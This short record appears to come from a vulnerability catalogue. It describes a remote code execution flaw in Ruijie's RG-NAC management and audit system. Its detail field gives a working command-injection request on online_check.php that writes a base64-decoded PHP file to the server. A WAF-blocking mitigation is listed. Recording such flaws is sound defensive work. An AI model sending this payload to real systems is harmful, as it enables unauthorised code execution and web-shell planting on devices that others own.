vendor = "锐捷"
name = "锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞"
type = "RCE"
version = "未知"
path = "/view/vpn/autovpn/online_check.php"
detail = "/view/vpn/autovpn/online_check.php?peernode= | `echo PD9waHAgcGhwaW5mbygpOw== | base64 -d > 1.php`"
fix = "WAF封禁路路径，等待发布补丁"
date = "0725"
label = "nday"
